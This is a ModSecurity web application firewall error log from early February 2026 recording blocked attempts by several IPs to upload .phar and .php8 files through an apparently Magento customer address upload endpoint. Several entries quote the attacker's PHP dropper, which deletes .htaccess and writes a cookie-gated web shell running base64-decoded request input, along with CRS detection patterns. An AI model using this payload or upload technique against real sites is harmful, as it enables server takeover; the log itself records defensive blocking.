[Tue Feb 03 16:59:32.880817 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYIbZGkgoJaKC5jg5Oxy0gAAAAk"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/5/8/5888364f428d25.phar
[Tue Feb 03 16:59:36.944990 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Rule 7f80eb359be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/8/5888364f428d25.php8"] [unique_id "aYIbaGkgoJaKC5jg5Oxy0wAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 03 16:59:36.945486 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/8/5888364f428d25.php8"] [unique_id "aYIbaGkgoJaKC5jg5Oxy0wAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 03 16:59:36.947883 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/8/5888364f428d25.php8"] [unique_id "aYIbaGkgoJaKC5jg5Oxy0wAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Tue Feb 03 16:59:36.948065 2026] [:error] [pid 1843381] [client 46.149.66.101:46842] [client 46.149.66.101] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/5/8/5888364f428d25.php8"] [unique_id "aYIbaGkgoJaKC5jg5Oxy0wAAAAk"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 04 20:13:52.314789 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Rule 7fee189a8be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.phar"] [unique_id "aYOacEO4sfdL3G3Lyh-mXgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 04 20:13:52.315338 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.phar"] [unique_id "aYOacEO4sfdL3G3Lyh-mXgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 04 20:13:52.317917 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.phar"] [unique_id "aYOacEO4sfdL3G3Lyh-mXgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 04 20:13:52.318112 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.phar"] [unique_id "aYOacEO4sfdL3G3Lyh-mXgAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 04 20:13:52.458265 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: sv88364f428d25.php8 found within FILES:custom_attributes[country_id]: sv88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYOacEO4sfdL3G3Lyh-mXwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/v/sv88364f428d25.phar
[Wed Feb 04 20:13:52.458961 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYOacEO4sfdL3G3Lyh-mXwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/v/sv88364f428d25.phar
[Wed Feb 04 20:13:52.459153 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYOacEO4sfdL3G3Lyh-mXwAAAAA"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/s/v/sv88364f428d25.phar
[Wed Feb 04 20:13:52.579032 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Rule 7fee189a8be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.php8"] [unique_id "aYOacEO4sfdL3G3Lyh-mYAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 04 20:13:52.579600 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.php8"] [unique_id "aYOacEO4sfdL3G3Lyh-mYAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 04 20:13:52.582272 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.php8"] [unique_id "aYOacEO4sfdL3G3Lyh-mYAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Wed Feb 04 20:13:52.582522 2026] [:error] [pid 1855584] [client 185.65.202.110:46762] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/s/v/sv88364f428d25.php8"] [unique_id "aYOacEO4sfdL3G3Lyh-mYAAAAAA"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 05 23:52:16.319329 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Rule 7f241a027be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/t/8t88364f428d25.phar"] [unique_id "aYUfIGEKMNI4e6YggV-XlQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 05 23:52:16.319844 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/t/8t88364f428d25.phar"] [unique_id "aYUfIGEKMNI4e6YggV-XlQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 05 23:52:16.322288 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/t/8t88364f428d25.phar"] [unique_id "aYUfIGEKMNI4e6YggV-XlQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 05 23:52:16.322476 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/t/8t88364f428d25.phar"] [unique_id "aYUfIGEKMNI4e6YggV-XlQAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 05 23:52:16.669549 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Warning. Pattern match ".*\\\\.(?:php\\\\d*|phtml)\\\\.*$" at FILES:custom_attributes[country_id]. [file "/usr/share/modsecurity-crs/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "109"] [id "933110"] [msg "PHP Injection Attack: PHP Script File Upload Found"] [data "Matched Data: 8t88364f428d25.php8 found within FILES:custom_attributes[country_id]: 8t88364f428d25.php8"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYUfIGEKMNI4e6YggV-XlgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/8/t/8t88364f428d25.phar
[Thu Feb 05 23:52:16.670259 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYUfIGEKMNI4e6YggV-XlgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/8/t/8t88364f428d25.phar
[Thu Feb 05 23:52:16.670452 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/customer/address_file/upload"] [unique_id "aYUfIGEKMNI4e6YggV-XlgAAAAQ"], referer: https://autumnus.test.indacotrentino.com/media/customer_address/8/t/8t88364f428d25.phar
[Thu Feb 05 23:52:16.907879 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Rule 7f241a027be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/t/8t88364f428d25.php8"] [unique_id "aYUfIGEKMNI4e6YggV-XlwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 05 23:52:16.908368 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/t/8t88364f428d25.php8"] [unique_id "aYUfIGEKMNI4e6YggV-XlwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 05 23:52:16.910871 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/t/8t88364f428d25.php8"] [unique_id "aYUfIGEKMNI4e6YggV-XlwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Thu Feb 05 23:52:16.911049 2026] [:error] [pid 1879005] [client 213.109.225.211:44848] [client 213.109.225.211] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/8/t/8t88364f428d25.php8"] [unique_id "aYUfIGEKMNI4e6YggV-XlwAAAAQ"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 07 03:31:17.110710 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Rule 7f099c9c1be8 [id "932150"][file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"][line "471"] - Execution error - PCRE limits exceeded (-8): (null). [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/y/qy88364f428d25.phar"] [unique_id "aYaj9dNid4fXT6wPf1RcbwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 07 03:31:17.112251 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Warning. Pattern match "(?:(?:_(?:\\\\$\\\\$ND_FUNC\\\\$\\\\$_|_js_function)|(?:new\\\\s+Function|\\\\beval)\\\\s*\\\\(|String\\\\s*\\\\.\\\\s*fromCharCode|function\\\\s*\\\\(\\\\s*\\\\)\\\\s*{|this\\\\.constructor)|module\\\\.exports\\\\s*=)" at ARGS:id. [file "/usr/share/modsecurity-crs/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf"] [line "68"] [id "934100"] [msg "Node.js Injection Attack"] [data "Matched Data: eval( found within ARGS:id: unlink('../../../.htaccess');file_put_contents($_SERVER['DOCUMENT_ROOT'].'/88364f428d25.php','<?php echo 409723*20;if(md5($_COOKIE[\\x22d\\x22])==\\x22\\x5c61\\x5cx37\\x5c60\\x5c62\\x5cx38\\x5c146\\x5cx34\\x5c70\\x5c67\\x5c143\\x5c142\\x5cx32\\x5c141\\x5c70\\x5cx34\\x5cx36\\x5cx30\\x5c67\\x5cx36\\x5c64\\x5cx36\\x5cx64\\x5c141\\x5c63\\x5c141\\x5c144\\x5c63\\x5c70\\x5c67\\x5cx38\\x5c145\\x5c143\\x22){echo\\x22\\x5cx6f\\x5cx6b\\x22;eval(base64_decode($_REQUEST[\\x22id\\x22]));if($_POST[\\x22\\x5c165\\x5c160\\x2..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-javascript"] [tag "platform-multi"] [tag "attack-rce [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/y/qy88364f428d25.phar"] [unique_id "aYaj9dNid4fXT6wPf1RcbwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 07 03:31:17.114777 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/y/qy88364f428d25.phar"] [unique_id "aYaj9dNid4fXT6wPf1RcbwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
[Sat Feb 07 03:31:17.114982 2026] [:error] [pid 1922252] [client 185.65.202.110:36730] [client 185.65.202.110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/media/customer_address/q/y/qy88364f428d25.phar"] [unique_id "aYaj9dNid4fXT6wPf1RcbwAAAAU"], referer: https://autumnus.test.indacotrentino.com/customer/address_file/upload
